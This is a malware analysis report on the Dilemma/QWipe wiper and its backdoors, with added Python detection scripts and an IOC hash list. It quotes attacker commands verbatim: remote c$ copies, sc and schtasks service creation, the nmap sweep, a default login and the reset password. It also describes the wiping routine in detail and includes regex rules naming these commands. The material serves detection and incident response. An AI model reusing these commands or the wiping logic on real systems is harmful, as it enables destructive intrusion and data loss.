Updated on 03-13-2022:
On 03-11-2022 the AFTA Center released a warning about this set of malware under the title “detecting a new malware in infrastructure” and named it “Dilemma”. It is the same malware as HackTool.Win32.QWipe, and its complete analysis follows.
Please refer to AFTA Center to read the report.
Technical details
1.1 Modules and malware operation sequences
This malware consists of many modules, including executable programs and various scripts, each of which has its own small task.
The following is a list of the malware files with a brief description of what each does.
File Name | Description |
HackTool.Win32.PS_Backdoor | The malware’s backdoor file; used to execute the hacker’s commands and to download/upload arbitrary files |
HackTool.Win32.QWipe | Wipes hard-disk data, changes users’ passwords, deletes Windows backup files, etc. |
wint.bat | Runs the scheduled task that starts the msdskint.exe service |
Lastfile | Holds the path of the last wiped file |
HackTool.Win32.HttpBackdoor | Acts as an HTTP backdoor on the system and executes the intruder’s commands |
HackTool.Win32.HttpCallBackService | The intruder’s HttpCallBackService tool, used to establish a connection with the C&C servers |
HackTool.Win32.PS_Distributor | Distribution tool for the hacker’s HttpBackdoor |
Table 1 - Summary of the malware payloads
1.1.1 Description of the HackTool.Win32.PS_Backdoor threat
This malware acts as a backdoor for the hacker: it lets the hacker execute commands remotely from the server, and it can also download/upload arbitrary files. All data this file sends and receives travels in TLS packets.
The malware opens 4 listening sockets on local addresses of the victim’s system and waits for data on them. When data is received, it is forwarded to the remote server at the address below. The malware connects to its remote server on port 8443; like port 443, this port carries TLS-encrypted traffic. This server is currently offline.
When port 443 is used, the port need not be written next to the domain name; when port 8443 is used, it must be.
Below we explain the function of each socket.
Socket No. | Function |
127.0.0.1:62563 | For each TLS packet received on this socket, the malware spawns a cmd.exe process by calling the main_startshell function; once the command has run, it terminates the cmd.exe process and listens again. The malware seems to use this socket only to receive commands to execute. |
127.0.0.1:36774 | Receives HTTP packets over TLS and calls the main_starthttp function to download/upload files. |
49151:[::] 0.0.0.0:49151 | Establishes a proxy between this socket and the hacker’s remote server |
Table 2 - The malware sockets and their function
1.1.2 wint.bat behaviour
This file starts the malware’s Wiper service. The service carries the fake name Windows Taks Scheduler; note that they used the word Taks instead of Task. The Wiper file has been seen on different systems at the following paths, as msdskint.exe and Dilemma.exe:
c:\windows\ccmcache\6\msdskint.exe
c:\programdata\pcmr\msdskint.exe
1.1.3 HackTool.Win32.QWipe behaviour
This file is the Wiper created by the hacker; it accepts command-line arguments. If no argument is supplied, the file falls back on predefined arguments built into it.
The hacker packed this file with the “Eziriz .NET Reactor” tool to hide the malware code from analysts and antivirus. Below is how it behaves once unpacked.
The following table lists the arguments accepted by the Wiper and what each does.
Entry argument | Function |
-wipe-exclude | The paths following this argument are added to the malware’s exclusion list so they are left untouched during wiping. |
-light-wipe | Number of times the malware’s buffer is written to each file on the victim’s system during wiping. |
-sessions | Restarts and logs off all active sessions of the system |
-delete-users | Deletes the user accounts passed with the argument |
-shadows | Wipes all system backup versions |
-start-iis | Restarts the iis service |
-config | Undefined behaviour |
-processes | Terminates the processes passed with the argument |
-logs | The malware wipes all OS and Event Viewer logs using Windows wevtutil.exe and Enum |
-delete | If this argument is given, the wiped files are finally removed from the system (via Win32Native.DeleteFile) |
-break-users | Changes the passwords of the victim system’s users |
-wipe-only | Wipes only the files under the given paths |
-purge | Complete removal; its wiping procedure differs from the normal one. |
-passwords | Undefined behaviour |
-wipe-all | Wipes all system drives |
-stop-iis | Stops the iis service |
Table 3 - HackTool.Win32.QWipe malware arguments
- -break-users argument
If this argument is given and a user is specified, the malware sets a password on each specified account. This password is the fixed string “S7Y1a82R!”.
Figure 1 - The malware changing a user’s password
- -purge argument
This argument affects how the malware wipes files. In general, the value written over the data is a 200-byte buffer whose contents are generated randomly by an algorithm.
If the purge argument is given, the full_purge value is set inside the malware code; this selects the malware’s complete wipe, in which the buffer is written over the file repeatedly until the end of the file is reached.
The malware also contains a purgeExtensions list in its code, holding the hacker’s candidate extensions. A file whose extension is in this list is wiped with the same procedure as full_purge.
Figure 2 - Candidate extensions
In addition to the above list, the malware file contains other strings that can serve as candidate extensions, as follows:
.accdb, .cdx, .dmp, .js, .pnf, .rom, .tif, .wmdb, .acl, .cfg, .doc, .hlp, .png, .rpt, .tiff, .wmv, .acm, .chk, .docx, .hpi, .lnk, .pps, .rsp, .tlb, .xdr, .amr, .com, .dot, .ppt, .sam, .tmp, .xls, .apln, .cpl, .drv, .pptx, .scp, .tsp, .xlsx, .asp, .cpx, .dwg, .hxx, .m4a, .pro, .scr, .avi, .dat, .eml, .ico, .mid, .psd, .sdb, .xsd, .ax, .db, .nls, .rar, .sig, .wab, .zip, .bak, .dbf, .ext, .one, .wab~, .bin, .dbx, .fdb, .jar, .pdf, .rdf, .sqlite, .wav, .bmp, .dll, .gif, .jpg, .pip, .resources, .theme, .wma, .config, .mxf, .mp3, .mp4, .cs, .vb, .tib, .aspx, .pem, .crt, .msg, .mail, .enc, .msi, .cab, .plb, .plt
- -wipe-all argument
If this argument is given, all active drives of the system are collected into a list, and then the data on every drive is wiped.
Three files are excluded from wiping:
- default.htm
- index.htm
- death_to_raisi.exe
When full_purge is not set and the file’s extension is not among the candidate extensions, the wiping procedure is as follows. First, 200 bytes from the defined buffer are written at offset zero of the file. Then the file size is divided by 1024 and the result is stored in num4.
If no light_wipe value was entered, the minimum of light_wipe and num4 is calculated and stored in num4.
The malware then advances 1024 bytes (0x400) from the offset and writes the same 200 bytes again, continuing this pattern until the end of the file. Finally, it creates the lastfile2 file inside the wiped folder and writes the file’s path into it.
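The layout described above lends itself to a simple forensic check. The following Python is an added example (not code from the report or from Padvish) that models the documented pattern: a 200-byte buffer written at offset 0 and again at every 1024-byte stride, with the number of blocks bounded by num4 and by -light-wipe. Because the same buffer is repeated, a file wiped this way repeats its first 200 bytes at 1 KiB boundaries, which an intact file practically never does; the detector counts those repeats. Whether the write at offset 0 counts toward num4 is not stated in the report, so the block treats num4 as the total number of blocks; the "wiped" sample file is constructed in memory.

```python
"""Forensic triage for the QWipe light-wipe stride pattern (added example)."""
import hashlib
from typing import Optional

CHUNK = 200    # size of the wiping buffer written at each position
STRIDE = 1024  # distance between successive writes of the buffer


def expected_writes(file_size: int, light_wipe: Optional[int]) -> int:
    """num4 as the report describes it: file_size // 1024, capped by the
    -light-wipe value when one is in effect (the default service run uses 3).
    Treated here as the upper bound on how many 200-byte blocks are overwritten
    (assumption: the report does not say whether offset 0 counts toward num4)."""
    num4 = file_size // STRIDE
    if light_wipe is not None:
        num4 = min(light_wipe, num4)
    return num4


def qwipe_stride_repeats(data: bytes) -> int:
    """Count 1024-byte strides (offsets 1024, 2048, ...) whose first 200 bytes
    are identical to the 200 bytes at offset 0.  QWipe writes the *same*
    buffer at every stride, so a wiped file shows such repeats, while an
    intact file practically never repeats its header at each 1 KiB boundary.
    A header made of a single byte value (e.g. all zeros) is ignored, because
    zero-filled regions would repeat trivially and cause false positives."""
    if len(data) < CHUNK:
        return 0
    head = data[:CHUNK]
    if len(set(head)) < 2:
        return 0
    repeats = 0
    for off in range(STRIDE, len(data) - CHUNK + 1, STRIDE):
        if data[off:off + CHUNK] == head:
            repeats += 1
    return repeats


def looks_qwiped(data: bytes, min_repeats: int = 1) -> bool:
    """Triage verdict: at least `min_repeats` stride repeats of the header."""
    return qwipe_stride_repeats(data) >= min_repeats


def constructed_clean(size: int = 4096) -> bytes:
    """Constructed test data: a plain text blob, untouched."""
    return (b"The quick brown fox jumps over the lazy dog.\n" * 200)[:size]


def constructed_sample(size: int = 4096, light_wipe: int = 3) -> bytes:
    """Constructed test data (not a real artefact): the text blob laid out the
    way the report describes a light-wiped file, i.e. one pseudo-random
    200-byte buffer at offset 0 and at the following 1024-byte strides, up to
    expected_writes() blocks in total."""
    buf = b"".join(hashlib.sha256(b"constructed-%d" % i).digest()
                   for i in range(7))[:CHUNK]
    body = bytearray(constructed_clean(size))
    for k in range(expected_writes(size, light_wipe)):
        body[k * STRIDE:k * STRIDE + CHUNK] = buf
    return bytes(body)


if __name__ == "__main__":
    wiped, clean = constructed_sample(), constructed_clean()
    print("wiped sample stride repeats:", qwipe_stride_repeats(wiped))   # 2
    print("clean sample stride repeats:", qwipe_stride_repeats(clean))   # 0
    print("blocks destroyed at most:", expected_writes(len(wiped), 3))   # 3
```

Run qwipe_stride_repeats over the bytes of a suspect file: a non-zero count on a file that should be text, a document or a database is a strong indication of the light-wipe pattern, and expected_writes() gives the maximum number of 200-byte blocks that were overwritten, so the remaining content of a large file may still be recoverable. Files with the candidate extensions, or wiped with full_purge, are overwritten end to end and will not show this stride signature.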
As mentioned before, if the malware’s Wiper file receives no argument, it uses its predefined arguments. When this file is executed under the service, it uses the following default arguments:
Figure 3 - String list used as the entry arguments
According to these arguments, the service acts as follows:
1- The -light-wipe value is 3, meaning the wiping buffer is written 3 times to each file.
2- The iis service is stopped.
3- All Windows Event Viewer logs are deleted.
4- All backup files are deleted.
5- The -processes value is *sql, meaning every process whose name contains the SQL string is terminated.
6- The data of all active drives, except the excluded paths, is wiped.
7- The paths excluded by the hacker are as follows:
"C:\Windows" "C:\$Recycle.Bin" "C:\$WinREAgent" "C:\Config.Msi" "C:\MSOCache" "C:\Recovery" "C:\Program Files\IBM\*" "C:\System Volume Information" "C:\Program Files\dotnet" "C:\Program Files (x86)\dotnet*" "C:\Program Files\Symantec*" "C:\Program Files (x86)\Symantec*" "C:\Program Files (x86)\Padvish*" "C:\Program Files\Kaspersky*" "C:\Program Files (x86)\Kaspersky*" "C:\Program Files\Microsoft*" "C:\Program Files (x86)\Microsoft*" "C:\Program Files\Windows*" "C:\Program Files (x86)\Windows*"
A function inside the malware shows that the hacker was wary of the Padvish antivirus. As Figure 4 shows, the malware inspects the list of running processes on the victim’s system. If Padvish or its UI is among them, instead of executing its default wiping functions the malware switches to another method to wipe data.
The reason for this change of tactics appears to be evading the Padvish behavioral detection system, which detects the malware’s wiping method and blocks it immediately; however, Padvish detected and blocked the malware’s alternative method as well.
In the second method, the malware creates a temporary bat file (tmp.bat) for each target file and creates two temporary scheduled tasks with SYSTEM permissions to run them.
Figure 4 - The malware searching for the Padvish antivirus UI and service
Figure 5 - The malware changing its wiping method after finding the Padvish antivirus service
Below is an example of the created bat file:
Figure 6 - An example of the bat file created to wipe data
As the bat file contents show, the malware first uses the Windows fsutil tool to create a file of null bytes with the same size as the file to be wiped (3072 bytes) and the .qipe extension. It then tries to replace the original file with this dummy file.
The hacker anticipated that Padvish could stop this malware from wiping data, so it fell back on another method, using a standard system tool, to wipe data. Nevertheless, the Padvish anti-ransomware component (Anti-Crypto) successfully prevented this attack.
There are commands inside the malware code indicating that it can keep a run-time log while wiping, as follows:
The log contains strings such as “– Excluded”, “– Skipped”, “BreakSelectedUsers”, “DeleteSelectedUsers”, “KillProcesses”, etc. It ends with the “Finished on” string, which records the time the wiping finished. However, the hacker apparently did not need to keep this log from the Wiper file, since no code was provided for the Output function, whose job is to print the result.
1.1.4 HackTool.Win32.HttpCallbackService behaviour
The hacker uses this file as a tool for downloading/uploading files and executing arbitrary commands on the victim’s system. Its behaviour is explained below.
This file reads the information about the malware server from its configuration file or from its input.
The following table shows the commands supported by this tool:
Command | Function |
Download/Upload | Encrypted download of files from the victim’s machine, or upload of files to the malware server, and vice versa |
stay-alive | Activates the isStayAliveMode flag |
cool-down | Deactivates the isStayAliveMode flag (for 1 minute) |
Default | Executes the hacker’s commands through the command line |
Table 4 - HttpCallbackService tool command list
The following figures show the complete scheme of the malware and the queries it accepts.
Figure 7 - HttpCallbackService malware function
Figure 8 - List of strings and queries
First, the malware reads the hacker’s server address from the configuration file and, depending on how the configuration file contents end, uses the following queries.
Query | Ending of the configuration file string |
=m? | .aspx |
=m? | .php |
=m | / |
=m/ | default |
Table 5 - Strings and queries
The procedure for receiving commands from the server (for example, the malware server downloading a file from the client) is as follows: after connecting to the server, the contents of the file named =m are fetched from the server. Once the specified file path has been obtained, the file is encoded with base64 and sent to the server.
Figure 9 - Contents of the command file on the server side
Figure 10 - The malware encoding a file and sending it to the malware server
If the =m file contains a command, the command is executed by cmd.exe.
Figure 11 - Executing commands by cmd.exe
The malware writes the results of its operations to a .out file on the victim’s system.
Figure 12 - The HttpCallbackService malware output log
1.1.5 HackTool.Win32.HttpBackdoor behaviour
This file acts as an HTTP service for the hacker. The information about the hacker’s arbitrary commands is stored in two files: uhsvc.exe.start and uhsvc.exe.ini. The name of this file differed between attacks.
This service, registered on the system as Microsoft Update Health Host, contains commands to download/upload files; it can also connect to a SQL database, send the results to the malicious server, and manipulate local files. Two versions of the httpservice have been found, 0.1.3vXH and 0.1.4vXH; they do not differ in behaviour and accept the same commands.
Like the hacker’s Wiper file, this file is packed with the “Eziriz .NET Reactor” tool. Additionally, the malware configuration file contains the following commands.
Command | Function |
ipconfig /all | Retrieves the IP settings of the network cards |
whoami /all | Retrieves the username, user groups, privileges and access rights |
systeminfo | General system information such as OS type, physical and virtual memory, domain, network card, etc. |
tasklist | List of running processes |
wmic logicaldisk get name | Names of the disk partitions |
net user | User names on the current system |
dir c:\users | Lists the contents of c:\users |
net sessions | List of current remote sessions |
net view /all | List of current shared resources |
net share | List of shared drives and folders |
route print | Routing table information |
netstat -aon | Connection table of the active ports |
ping 8.8.8.8 -n 2 | Checks whether the current system can reach the Internet |
Table 6 - Commands used inside the HttpBackdoor tool configuration file
Decoding the file yielded the following findings:
1- When executed under the service, the malware creates a tcpListener on the victim’s system. Here we describe one of the malware versions, which uses port 9399. In the samples found together with uhsvc.exe.start, the hacker allowed inbound packets to port 9399 (in some cases port 9396) through the firewall from outside the victim’s network.
Figure 13 - uhsvc.exe.start file contents
2- The malware can receive and execute various commands from the hacker’s server. It executes these commands using the cmd tool.
Figure 14 - Executing the hacker’s arbitrary commands through the shell
3- It uses the sqlConnection and sqlCommand functions to execute queries against the SQL database.
4- Creating files
Figure 15 - The hacker creating a file through the malware
5- The malware can zip or unzip directory contents, download/upload files, and delete the hacker’s chosen files when required. It uses the IonicZip library to compress files.
Figure 16 - Compressing/decompressing and removing files
Figure 17 - Manipulating directory contents
6- It can receive proxies chosen by the server, using the =b and =p commands, to connect to the server.
Figure 18 - Commands related to the proxy
Figure 19 - Setting the proxy
7- It can display the malware version to the hacker (the hacker used several versions of HackTool.Win32.HttpBackdoor in this operation).
Figure 20 - Displaying the malware version
8- It can report the path of the current malware file (“c:\programdata\pcmr\uhsvc.exe” is the malware path).
9- It can create log files and send them to the hacker to report possible errors.
Figure 21 - Creating a log file
Figure 22 - Log file
The following table shows the operations supported by the malware:
Command | Function |
a_1=s | ShellExecute with #zip support |
a_1=c | Run SQL commands |
a_1=i1 | View output and error logs and delete them |
a_1=i2 | Delete output and error logs |
a_1=i | Run cmd interactively |
Cmd= | ShellExecute |
W_i | Show malware path |
V_i | Show malware version |
P= or b= | Act as a proxy and forward the connection to another website/infected node |
M=afe=1 | Write any file |
Con= | Run SQL commands |
Prt= | File manager (browse directories, download/upload files, …) |
other | Read/Write based on GET |
Table 7 - Malware web service commands
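The command keys in Table 7 are distinctive enough to hunt for in request logs from a reverse proxy, WAF or network sensor placed in front of the listener port (9399, in some samples 9396). The following Python is an added example, not code from the report or from Padvish: it parses a combined-log style line (the log format is an assumption), extracts the query string and reports which Table 7 keys appear. The log lines are constructed. P and b are single-letter keys that ordinary web applications also use, so they are scored only as weak signals unless a stronger key accompanies them.

```python
"""Hunt for HackTool.Win32.HttpBackdoor command keys in HTTP request logs (added example)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Query keys documented in Table 7.  a_1, Cmd, Con, Prt, M, W_i and V_i are
# specific enough to act on alone; P and b are generic single letters and
# therefore only count as weak signals.
STRONG_KEYS = {"a_1", "Cmd", "Con", "Prt", "M", "W_i", "V_i"}
WEAK_KEYS = {"P", "b"}
A1_MODES = {"s": "ShellExecute with #zip support", "c": "run SQL commands",
            "i1": "view and delete logs", "i2": "delete logs",
            "i": "interactive cmd"}

# Assumed (constructed) combined-log layout: client, timestamp, quoted
# request line, status, size.  Adjust LINE_RE for your own sensor format.
LINE_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def backdoor_keys(request_target: str):
    """Return the (key, value) pairs of the query string that match Table 7.
    keep_blank_values=True matters: W_i and V_i are sent without an '=' and
    parse_qsl would otherwise drop them."""
    query = urlsplit(request_target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if k in STRONG_KEYS or k in WEAK_KEYS]


def classify(request_target: str):
    """'strong' if a documented command key is present, 'weak' if only the
    ambiguous proxy keys P/b are, None otherwise."""
    hits = backdoor_keys(request_target)
    if any(k in STRONG_KEYS for k, _ in hits):
        return "strong"
    if hits:
        return "weak"
    return None


def describe(hits) -> str:
    """Readable explanation, e.g. a_1=s -> 'ShellExecute with #zip support'."""
    parts = []
    for k, v in hits:
        if k == "a_1":
            parts.append("a_1=%s: %s" % (v, A1_MODES.get(v, "unknown mode")))
        else:
            parts.append("%s=%s" % (k, v) if v else k)
    return "; ".join(parts)


def scan_log(text: str):
    """Return (client, level, description) for every line with a hit."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        level = classify(target)
        if level:
            findings.append((m.group("client"), level, describe(backdoor_keys(target))))
    return findings


# Constructed sample lines, not real telemetry.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2022:10:01:02 +0000] "GET /?a_1=s&Cmd=whoami HTTP/1.1" 200 312
10.0.0.5 - - [12/Mar/2022:10:01:09 +0000] "GET /?V_i HTTP/1.1" 200 16
10.0.0.7 - - [12/Mar/2022:10:02:00 +0000] "GET /index.htm?b=1 HTTP/1.1" 200 2048
10.0.0.8 - - [12/Mar/2022:10:03:00 +0000] "GET /products?page=2 HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    for client, level, what in scan_log(SAMPLE_LOG):
        print(client, level, what)
```

The third sample line shows why the weak tier exists: b=1 on an ordinary page is noise on its own, but the same key on a host listening on 9399 or paired with a_1 or Cmd is worth a look, and the a_1 mode text tells the analyst immediately whether shell execution, SQL access or log deletion was requested.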
1.1.6 HackTool.Win32.PS_Distributor behaviour
This file acts as the hacker’s distribution tool. It connects to network clients and creates and starts the hacker’s chosen service and scheduled tasks; in other words, it carries out the distribution across the network.
Figure 23 - Start of the malware’s distribution operation
This file uses network shares and the “net use” command for its operation. As the above figure shows, it contains a default username and password for connecting to the clients:
Username : TicketUser |
Additionally, this file can receive information such as the username, password, and share folder path as entry arguments. It can also read the list of target IPs from distributor.ini.
After connecting to the chosen clients, the malware copies the Httpservice tool as follows:
“copy /y c:\\windows\\msunify4.exe \\\\” + ip + \\c$\\windows\\msedgeupdate.exe “copy /y c:\\windows\\msunify.start \\\\” + ip + \\c$\\windows\\msedgeupdate.exe.start |
As the above commands show, the HackTool.Win32.HttpBackdoor tool exists on the current system as msunify4.exe; it is copied to the destination system under the name msedgeupdate.exe. msedgeupdate.exe.start, which is identical to msunify.start, is the configuration file of this tool.
Figure 24 - The malware connecting to network clients
Then the malware creates the following service:
“sc \\\\” + ip + ” create \”Microsoft Edge Update Service (edgeupdatel)\” binpath= \”c:\\windows\\msedgeupdate.exe\” start= auto” “sc \\\\” + ip + ” start \”Microsoft Edge Update Service (edgeupdatel)\”” |
As shown, a service named Microsoft Edge Update Service (edgeupdatel) is created and started on the client for the msedgeupdate.exe file (the HackTool.Win32.HttpBackdoor tool).
Figure 25 - Creating and starting the service on the clients
Then the malware creates a scheduled task to run the chosen tool on the clients.
“copy c:\\windows\\msunify.css \\\\” + ip + \\c$\\Users\\Public\\CreateService.bat “schtasks /create /S {0} /tn \”Backup checks\” /XML c:\\windows\\msunify4.xml /U \”{1}\” /P \”{2}\” /F” “schtasks /run /S {0} /tn \”Backup checks\” /U \”{1}\” /P \”{2}\”” |
The above commands show that the malware copies the msunify.css file from the current system to the client as CreateService.bat under c$\Users\Public\. This file extracts Nmap.exe to look for security flaws in the network configuration; the results are stored in a file named pse200.tmp. The CreateService.bat file runs the following command:
c:\windows\temp\nmp\nmap.exe -sV 200.200.0.0/16 -oN C:\windows\temp\pse200.tmp |
Finally, the HackTool.Win32.PS_Distributor tool creates a scheduled task named Backup checks from the msunify4.xml file.
Figure 26 - HackTool.Win32.PS_Distributor creating a scheduled task
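Several of the commands quoted in this section (the sc create for edgeupdatel, the "Backup checks" schtasks, the nmap sweep writing pse200.tmp), together with the fsutil .qipe step from Figure 6, the Windows Taks Scheduler typo, the TicketUser account and the dropped binary names, make good process-creation detections. The Python below is an added example, not code from the report or from Padvish, that applies those indicators as regular expressions to command lines taken from a process-creation log (Sysmon event 1 or Windows 4688 after the command line has been extracted; the input is assumed to be one bare command line per entry). The sample lines are constructed; the fsutil line assumes the standard fsutil file createnew syntax, which the report does not quote.

```python
"""Process command-line detections for the Dilemma/QWipe tool set (added example)."""
import re

# Each rule is (name, strength, regex).  The strings come from the report: the
# edgeupdatel service name, the "Backup checks" task, .qipe dummy files made
# with fsutil, the Windows Taks Scheduler typo, the TicketUser account, the
# nmap sweep output pse200.tmp and the dropped binary names.  wevtutil alone is
# a low-confidence signal because administrators use it legitimately.
RULES = [
    ("edgeupdatel service created via sc", "high",
     re.compile(r"\bsc(\.exe)?\b.*\bcreate\b.*edgeupdatel", re.I)),
    ("'Backup checks' scheduled task", "high",
     re.compile(r"schtasks(\.exe)?\b.*/tn\s+\"?Backup checks", re.I)),
    (".qipe dummy file created with fsutil", "high",
     re.compile(r"fsutil(\.exe)?\b.*\.qipe\b", re.I)),
    ("Windows Taks Scheduler service name typo", "high",
     re.compile(r"Windows Taks Scheduler", re.I)),
    ("net use with TicketUser account", "high",
     re.compile(r"\bnet(\.exe)?\s+use\b.*TicketUser", re.I)),
    ("nmap sweep from CreateService.bat", "high",
     re.compile(r"\\nmp\\nmap\.exe|pse200\.tmp", re.I)),
    ("known dropped binary name", "medium",
     re.compile(r"\b(msdskint|msedgeupdate|msunify4?|uhsvc|dilemma)\.exe\b", re.I)),
    ("wevtutil invoked (log clearing; tune for admin use)", "low",
     re.compile(r"\bwevtutil(\.exe)?\b", re.I)),
]
_ORDER = {"high": 3, "medium": 2, "low": 1}


def match_rules(command_line: str):
    """Names of all rules whose regex matches the command line."""
    return [name for name, _, rx in RULES if rx.search(command_line)]


def highest_strength(names):
    """Strongest tier among the matched rule names, or None."""
    tiers = [s for n, s, _ in RULES if n in names]
    return max(tiers, key=_ORDER.get) if tiers else None


def scan_process_log(lines):
    """Return (index, strength, rule names) for each line with at least one hit."""
    hits = []
    for i, line in enumerate(lines):
        names = match_rules(line)
        if names:
            hits.append((i, highest_strength(names), names))
    return hits


# Constructed command lines, not real telemetry.  Lines 1, 2 and 5 mirror the
# commands quoted in section 1.1.6; line 3 mirrors the fsutil step of the bat
# file in Figure 6 (syntax assumed); line 4 is ordinary background noise.
SAMPLE_LINES = [
    r'sc \\10.1.2.3 create "Microsoft Edge Update Service (edgeupdatel)" binpath= "c:\windows\msedgeupdate.exe" start= auto',
    r'schtasks /create /S 10.1.2.3 /tn "Backup checks" /XML c:\windows\msunify4.xml /F',
    r'fsutil file createnew C:\data\report.docx.qipe 3072',
    r'C:\Windows\System32\svchost.exe -k netsvcs -p',
    r'c:\windows\temp\nmp\nmap.exe -sV 200.200.0.0/16 -oN C:\windows\temp\pse200.tmp',
]

if __name__ == "__main__":
    for idx, tier, names in scan_process_log(SAMPLE_LINES):
        print(idx, tier, "; ".join(names))
```

The first sample line trips two rules at once (the service name and the dropped binary path), which is the pattern to alert on: a single medium-tier name hit may be a coincidence, but a high-tier rule paired with a second indicator from the same section of the report is not.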
2. How to deal with this malware
All detected versions and variants of this malware are detected by Padvish Antivirus as HackTool.Win32.HTTPbackdoor, HackTool.Win32.PS_Backdoor, HackTool.Win32.PS_Distributor, HackTool.Win32.HTTPCallBackService and Trojan.Win32.QWipe.
Additionally, the Padvish Data Protection component detects the malware’s wiping behaviour, prevents any tampering with data, and terminates the malware’s execution.
3. Indicator of Compromise (IOC)
File name | MD5 |
uhsvc.exe, cbsvc.exe, msunify.exe, msunify4.exe, msedgeupdate.exe | 466832ef3f81f1cc37466be9e1b7c4d2, 9fbab064ec583f80dc15e1abc2ebcad3, 2529ed634df912d95d52be717560b0b6, cc97e34cf19f56263abd0f89e907cf7a, 66e6d3b03613074f38b2a6acff8e8229, 94354ecf588835cea2352b873211290e, af029e3168e27394020b3f4315b2419b, 2c1e86a5c5c5ad19d64baa66e78af6f1, e633f5ce289cdcbdee93b7c02178fa35, 4cc3665c4fb23ace6b0f9b396c66f8e6, 987a94bdce7f9d50fc0a30f2b10189f6, 1a773e123469ea5a22fd3c21b0de56e9, c85af99a8c3bcb5826b9f938ba14d538 |
uhsvc.exe.start, msunify.start, msedgeupdate.exe.start | 381d8239561c3714c1b71f0c2df4f57e, 798754303e774a09e5b0e7eff424fd7d |
Msunify.css, MSUnifySvc.bat | eb08b4c7ecc25053e5fb23c200e7734b, ff2253be230bb20fc68c3a1ad1107c72 |
wdisvc.exe, spoolsvc.exe, edgeupdatel.exe, edgeupdaten.exe | 0ff024b1f42104ff0e9b22c38f293ad4 |
costura.ini | 6cbc6bcc647bd8a8afb8384e95bc2fa1 |
CDPSvc.bat | dafb3f2bce39562a68e6bd4176af6d86 |
SpoolService.bat | beb00ea7a94fff2ce321a0e9377750ad |
CreateService.bat | 03c3c225122414a94f90b2aedee490e9 |
dao.exe | 6319dfec18c53bfcd28cda698f03bd55 |
msdskint.exe, Dilemma.exe | 13e7caebf00dd2315885e1f47030eb3c, 6d806a5b0390262b5ef4687ba10c540c |
Distributor.exe | 29841e0069749e1255269cdf4cf6e965 |
Distributor.ini | 2ee8f6d4853c59c2462ff0b71b455719 |
wint.bat | 0aa3b91d584803a39250742b69173841 |
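The table above is straightforward to turn into a file-system sweep. The Python below is an added example, not code from the report or from Padvish: it carries the 28 MD5 values and 24 file names from the table and walks a directory tree, reporting hash matches (conclusive) and name matches (a lead only, since names such as costura.ini or SpoolService.bat also occur legitimately). The demo directory it creates contains constructed placeholder files, not the samples.

```python
"""Sweep a directory tree for the Dilemma/QWipe IOCs listed above (added example)."""
import hashlib
import os
import tempfile
from pathlib import Path

# MD5 values copied from the IOC table (lowercase hex).
IOC_MD5 = {
    "466832ef3f81f1cc37466be9e1b7c4d2", "9fbab064ec583f80dc15e1abc2ebcad3",
    "2529ed634df912d95d52be717560b0b6", "cc97e34cf19f56263abd0f89e907cf7a",
    "66e6d3b03613074f38b2a6acff8e8229", "94354ecf588835cea2352b873211290e",
    "af029e3168e27394020b3f4315b2419b", "2c1e86a5c5c5ad19d64baa66e78af6f1",
    "e633f5ce289cdcbdee93b7c02178fa35", "4cc3665c4fb23ace6b0f9b396c66f8e6",
    "987a94bdce7f9d50fc0a30f2b10189f6", "1a773e123469ea5a22fd3c21b0de56e9",
    "c85af99a8c3bcb5826b9f938ba14d538", "381d8239561c3714c1b71f0c2df4f57e",
    "798754303e774a09e5b0e7eff424fd7d", "eb08b4c7ecc25053e5fb23c200e7734b",
    "ff2253be230bb20fc68c3a1ad1107c72", "0ff024b1f42104ff0e9b22c38f293ad4",
    "6cbc6bcc647bd8a8afb8384e95bc2fa1", "dafb3f2bce39562a68e6bd4176af6d86",
    "beb00ea7a94fff2ce321a0e9377750ad", "03c3c225122414a94f90b2aedee490e9",
    "6319dfec18c53bfcd28cda698f03bd55", "13e7caebf00dd2315885e1f47030eb3c",
    "6d806a5b0390262b5ef4687ba10c540c", "29841e0069749e1255269cdf4cf6e965",
    "2ee8f6d4853c59c2462ff0b71b455719", "0aa3b91d584803a39250742b69173841",
}

# File names from the IOC table, lowercased for case-insensitive NTFS matching.
# A name-only hit is a lead to triage; a hash hit is conclusive.
IOC_NAMES = {
    "uhsvc.exe", "cbsvc.exe", "msunify.exe", "msunify4.exe", "msedgeupdate.exe",
    "uhsvc.exe.start", "msunify.start", "msedgeupdate.exe.start",
    "msunify.css", "msunifysvc.bat", "wdisvc.exe", "spoolsvc.exe",
    "edgeupdatel.exe", "edgeupdaten.exe", "costura.ini", "cdpsvc.bat",
    "spoolservice.bat", "createservice.bat", "dao.exe", "msdskint.exe",
    "dilemma.exe", "distributor.exe", "distributor.ini", "wint.bat",
}


def md5_hex(data: bytes) -> str:
    """MD5 of an in-memory byte string (the IOC table uses MD5)."""
    return hashlib.md5(data).hexdigest()


def md5_file(path, chunk: int = 1 << 20) -> str:
    """MD5 of a file, streamed so large files do not need to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def check_file(path):
    """Finding dict {'path', 'reasons'} for one file, or None when clean."""
    path = Path(path)
    reasons = []
    if path.name.lower() in IOC_NAMES:
        reasons.append("name")
    if md5_file(path) in IOC_MD5:
        reasons.append("md5")
    return {"path": str(path), "reasons": reasons} if reasons else None


def scan_tree(root):
    """Walk `root` and collect every finding; unreadable files are skipped."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            try:
                finding = check_file(Path(dirpath) / name)
            except OSError:
                continue
            if finding:
                findings.append(finding)
    return findings


def demo_scan():
    """Build a throwaway directory of constructed placeholder files and scan
    it: wint.bat is flagged by name only (its content is not the sample's),
    notes.txt is not flagged at all."""
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "wint.bat").write_bytes(b"rem constructed placeholder\r\n")
        (Path(d) / "notes.txt").write_bytes(b"constructed clean file\n")
        return scan_tree(d)


if __name__ == "__main__":
    for f in demo_scan():
        print(f["path"], f["reasons"])
```

On a real host, point scan_tree at the paths named in the report (c:\programdata\pcmr, c:\windows\ccmcache, c:\windows and c:\Users\Public) before sweeping whole volumes, and treat a name hit under one of those paths as high priority even without a hash match, since the hashes cover only the samples Padvish recovered.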